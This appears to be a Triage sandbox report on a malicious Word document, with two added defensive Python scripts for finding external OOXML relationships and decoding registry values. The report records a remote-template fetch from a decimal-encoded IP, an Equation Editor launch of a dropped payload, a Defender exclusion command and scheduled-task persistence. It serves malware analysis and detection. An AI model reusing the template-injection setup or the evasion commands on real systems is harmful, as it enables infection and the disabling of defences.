Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel: 101s
max time network: 104s
platform: windows7_x64
resource: win7-20230220-en
resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
submitted: 02/03/2023, 14:17
Static task: static1
Behavioral task: behavioral1 (Sample: POX010-240.docx, Resource: win7-20230220-en)
Behavioral task: behavioral2 (Sample: POX010-240.docx, Resource: win10v2004-20230220-en)
This page is the behavioral1 (Windows 7 x64) run.
General
Target: POX010-240.docx
Size: 10KB
MD5: 84b25af93d91ad40962a0db9403cc644
SHA1: d38e907dfbe22b0e0eb7ab7ae8515eb69a7dddbc
SHA256: da53bd57af58ae908cd30e303113930cecbd995719404e2dbd7009f0bc54926d
SHA512: ff3b085bde3ccff0592453ded391daac66819d5c8ad3035cb7c567891528ceb0c014c3265f8735cfa780de5d06c746a24f2d1504d669fbd17660f42ab855437c
SSDEEP: 192:ScIMmtP1aIG/bslPL++uOw4Nl+CVWBXJC0c3qe:SPXU/slT+LOw6HkZC9h
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow | pid | Process
7 | 552 | EQNEDT32.EXE
-
Downloads MZ/PE file
-
Abuses OpenXML format to download file from external location 2 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Office\14.0\Common | WINWORD.EXE
Key opened | \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Office\Common\Offline\Files\http://3324948138/bg...................................doc | WINWORD.EXE
Note: the Offline\Files key is where Word records a document it fetched by URL. The host 3324948138 is an IPv4 address written as a single decimal integer (198.46.174.170); WinInet accepts this form, and it slips past naive dotted-quad IP matching in proxy logs and IOC lists.
-
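The signature above is the registry trace of the fetch; the thing that caused it lives inside the .docx package as a relationship marked TargetMode="External", which Word resolves when the document opens, no macro required. The script below is an added example written for this page, not code from Triage or from the sample. It walks every .rels part of an OOXML package, lists external relationships, expands integer hosts such as 3324948138 to dotted-quad, and keeps only the relationship types Word loads on its own (a hyperlink needs a click, an attached template does not). The sample .docx it builds is constructed: the report does not show which relationship type the real file uses, so the example assumes an attachedTemplate relationship in word/_rels/settings.xml.rels and shortens the path to bg.doc.

```python
import io
import ipaddress
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

# Relationship types that make Word fetch *and load* the target at open time.
AUTO_LOAD_TYPES = {"attachedTemplate", "oleObject", "frame", "subDocument", "image"}


def normalize_host(host):
    """Expand a host written as one decimal integer (http://3324948138/...)
    to dotted-quad; any other host is returned unchanged."""
    if re.fullmatch(r"\d+", host):
        return str(ipaddress.IPv4Address(int(host)))
    return host


def external_relationships(docx_bytes):
    """Return (rels_part, relationship_type, target, host) for every
    relationship in the package whose TargetMode is External."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target", "")
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                host = urlsplit(target).hostname or ""
                hits.append((name, rtype, target, normalize_host(host)))
    return hits


def risky_relationships(hits):
    """Keep only relationships Word resolves without user interaction."""
    return [h for h in hits if h[1] in AUTO_LOAD_TYPES]


def build_sample_docx():
    """Constructed minimal .docx (not the real sample): a template-injection
    relationship pointing at the decimal-IP host from this report, plus a
    plain hyperlink that should be ignored."""
    rel_ns = REL_NS[1:-1]
    parts = {
        "[Content_Types].xml": '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>',
        "_rels/.rels": f'<Relationships xmlns="{rel_ns}"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>',
        "word/document.xml": '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body/></w:document>',
        "word/_rels/settings.xml.rels": (
            f'<Relationships xmlns="{rel_ns}">'
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://3324948138/bg.doc" TargetMode="External"/>'
            '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.com/" TargetMode="External"/>'
            "</Relationships>"
        ),
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        for name, xml in parts.items():
            pkg.writestr(name, xml)
    return buf.getvalue()


if __name__ == "__main__":
    for part, rtype, target, host in risky_relationships(external_relationships(build_sample_docx())):
        print(f"{part}: {rtype} -> {target} (host {host})")
```

Run it against a real .docx by passing the file's bytes to external_relationships; the decimal-to-dotted step is the part most IOC tooling forgets, so feed normalized hosts, not the raw Target string, into blocklists.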
Executes dropped EXE 6 IoCs
pid | Process
756 | vbc.exe
1724 | vbc.exe
1580 | vbc.exe
1748 | vbc.exe
1504 | vbc.exe
1280 | vbc.exe
-
Loads dropped DLL 2 IoCs
pid | Process
552 | EQNEDT32.EXE
552 | EQNEDT32.EXE
-
Uses the VBS compiler for execution 1 TTPs
Note: this signature matched on the file name vbc.exe. The process in this run is C:\Users\Public\vbc.exe, listed above under "Executes dropped EXE", i.e. the downloaded payload written under that name, not the Visual Basic compiler that ships with the .NET Framework.
-
Drops file in System32 directory 1 IoCs
description | ioc | Process
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
-
Drops file in Windows directory 1 IoCs
description | ioc | Process
File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Office loads VBA resources, possible macro or embedded object present
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
916 | schtasks.exe
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
pid | Process
552 | EQNEDT32.EXE
-
Modifies Internet Explorer settings 31 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command | WINWORD.EXE
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | WINWORD.EXE
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | WINWORD.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command | WINWORD.EXE
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | WINWORD.EXE
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND | WINWORD.EXE
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | WINWORD.EXE
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\Toolbar | WINWORD.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | WINWORD.EXE
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | WINWORD.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | WINWORD.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" | WINWORD.EXE
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | WINWORD.EXE
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | WINWORD.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | WINWORD.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | WINWORD.EXE
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND | WINWORD.EXE
Note: every entry in this section is WINWORD.EXE registering Office's own IE integration (the "Edit with Word" HTML/MHTML editor verbs and the OneNote/Excel context-menu extensions under MenuExt). It is Office first-run registration, not attacker activity.
-
Modifies registry class 64 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon | WINWORD.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command | WINWORD.EXE
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | WINWORD.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell | WINWORD.EXE
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command | WINWORD.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open" | WINWORD.EXE
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application | WINWORD.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" | WINWORD.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" | WINWORD.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" | WINWORD.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | WINWORD.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" | WINWORD.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application | WINWORD.EXE
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | WINWORD.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler | WINWORD.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open" | WINWORD.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe | WINWORD.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" | WINWORD.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe | WINWORD.EXE
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | WINWORD.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | WINWORD.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit | WINWORD.EXE
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | WINWORD.EXE
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | WINWORD.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version | WINWORD.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | WINWORD.EXE
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit | WINWORD.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit | WINWORD.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" | WINWORD.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit | WINWORD.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} | WINWORD.EXE
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command | WINWORD.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" | WINWORD.EXE
Note: all 64 entries are written by WINWORD.EXE under HKLM\SOFTWARE\Classes and register Office 2010's own .htm/.mht "Open with" verbs, DDE topics and the htmlfile icon handler. The three distinct REG_BINARY ...\command\command values are little-endian UTF-16 text: each decodes to an MSI Darwin descriptor (the advertised-command form of the same Word, Excel and Publisher commands shown as plain strings in the neighbouring ...\command\ values). This is Office first-run registration noise, not attacker persistence; the persistence in this report is the scheduled task and the Defender exclusion in the process tree.
-
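Hex blobs in a "Modifies registry class" listing are worth decoding before they are written off or escalated. The script below is an added example for this page (not Triage's code): it converts the three distinct REG_BINARY values from the section above from hex to UTF-16LE text and splits the result as an MSI Darwin descriptor, which is a 20-character squished ProductCode GUID, a feature name, a ">" separator, a 20-character squished ComponentId GUID, and optional command-line arguments. The hex strings are copied verbatim from the report; the dictionary keys "word", "excel" and "publisher" are labels chosen here. The GUIDs are left in squished form, since un-squishing them is not needed to classify the value.

```python
import re

# The three distinct ...\command\command REG_BINARY values from the report,
# exactly as Triage prints them (hex of the raw bytes). Keys are labels chosen here.
REPORT_VALUES = {
    "word": "7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000",
    "excel": "7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000",
    "publisher": "7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000",
}

# Darwin descriptor layout: 20-char squished ProductCode, feature name, '>',
# 20-char squished ComponentId, then whatever arguments follow.
_DESCRIPTOR = re.compile(r"^(?P<product>.{20})(?P<feature>[^>]+)>(?P<component>.{20})(?P<args>.*)$")


def decode_utf16_hex(hex_str):
    """REG_BINARY bytes -> text. The values are little-endian UTF-16 ending in
    a double NUL; everything from the first NUL onward is dropped."""
    return bytes.fromhex(hex_str).decode("utf-16-le").split("\x00", 1)[0]


def parse_darwin_descriptor(text):
    """Split an MSI Darwin descriptor into its fields, or return None when the
    text does not have that shape (e.g. a plain path with arguments)."""
    m = _DESCRIPTOR.match(text)
    if not m:
        return None
    fields = m.groupdict()
    fields["args"] = fields["args"].strip()
    return fields


def classify_report_values(values):
    """Decode every hex value and attach its parsed descriptor (or None)."""
    out = {}
    for key, hex_str in values.items():
        text = decode_utf16_hex(hex_str)
        out[key] = {"text": text, "descriptor": parse_darwin_descriptor(text)}
    return out


if __name__ == "__main__":
    for key, info in classify_report_values(REPORT_VALUES).items():
        d = info["descriptor"]
        print(f"{key:9} {info['text']}")
        if d:
            print(f"          feature={d['feature']} args={d['args']!r} product={d['product']}")
```

All three values carry the same squished ProductCode, which is what you expect when one installed Office product registers its Word, Excel and Publisher features; an attacker-written command value would decode to a path or a script, and parse_darwin_descriptor would return None for it.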
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid | Process
1768 | WINWORD.EXE
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid | Process | events
756 | vbc.exe | 11
904 | powershell.exe | 1
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
description | pid | Process
Token: SeDebugPrivilege | 756 | vbc.exe
Token: SeDebugPrivilege | 904 | powershell.exe
Token: SeShutdownPrivilege | 1768 | WINWORD.EXE
-
Suspicious use of SetWindowsHookEx 2 IoCs
pid | Process | events
1768 | WINWORD.EXE | 2
-
Suspicious use of WriteProcessMemory 36 IoCs
Each row below was reported four times (36 events, 9 distinct source/target pairs); target process names are taken from the process tree.
source pid | source Process | target pid | target Process | procid_target | events
552 | EQNEDT32.EXE | 756 | vbc.exe | 31 | 4
1768 | WINWORD.EXE | 844 | splwow64.exe | 33 | 4
756 | vbc.exe | 904 | powershell.exe | 35 | 4
756 | vbc.exe | 916 | schtasks.exe | 37 | 4
756 | vbc.exe | 1724 | vbc.exe | 39 | 4
756 | vbc.exe | 1580 | vbc.exe | 40 | 4
756 | vbc.exe | 1748 | vbc.exe | 41 | 4
756 | vbc.exe | 1504 | vbc.exe | 42 | 4
756 | vbc.exe | 1280 | vbc.exe | 43 | 4
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE  (PID 1768)
  "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\POX010-240.docx"
  - Abuses OpenXML format to download file from external location
  - Drops file in Windows directory
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
    C:\Windows\splwow64.exe  (PID 844)
      C:\Windows\splwow64.exe 12288
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  (PID 552)
  "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  - Blocklisted process makes network request
  - Loads dropped DLL
  - Launches Equation Editor
  - Suspicious use of WriteProcessMemory
    C:\Users\Public\vbc.exe  (PID 756)
      "C:\Users\Public\vbc.exe"
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 904)
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\iioqULceCJUGWS.exe"
          - Drops file in System32 directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
        C:\Windows\SysWOW64\schtasks.exe  (PID 916)
          "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iioqULceCJUGWS" /XML "C:\Users\Admin\AppData\Local\Temp\tmpFF9.tmp"
          - Creates scheduled task(s)
        C:\Users\Public\vbc.exe  (PID 1724)
          "C:\Users\Public\vbc.exe"
          - Executes dropped EXE
        C:\Users\Public\vbc.exe  (PID 1580)
          "C:\Users\Public\vbc.exe"
          - Executes dropped EXE
        C:\Users\Public\vbc.exe  (PID 1748)
          "C:\Users\Public\vbc.exe"
          - Executes dropped EXE
        C:\Users\Public\vbc.exe  (PID 1504)
          "C:\Users\Public\vbc.exe"
          - Executes dropped EXE
        C:\Users\Public\vbc.exe  (PID 1280)
          "C:\Users\Public\vbc.exe"
          - Executes dropped EXE
-
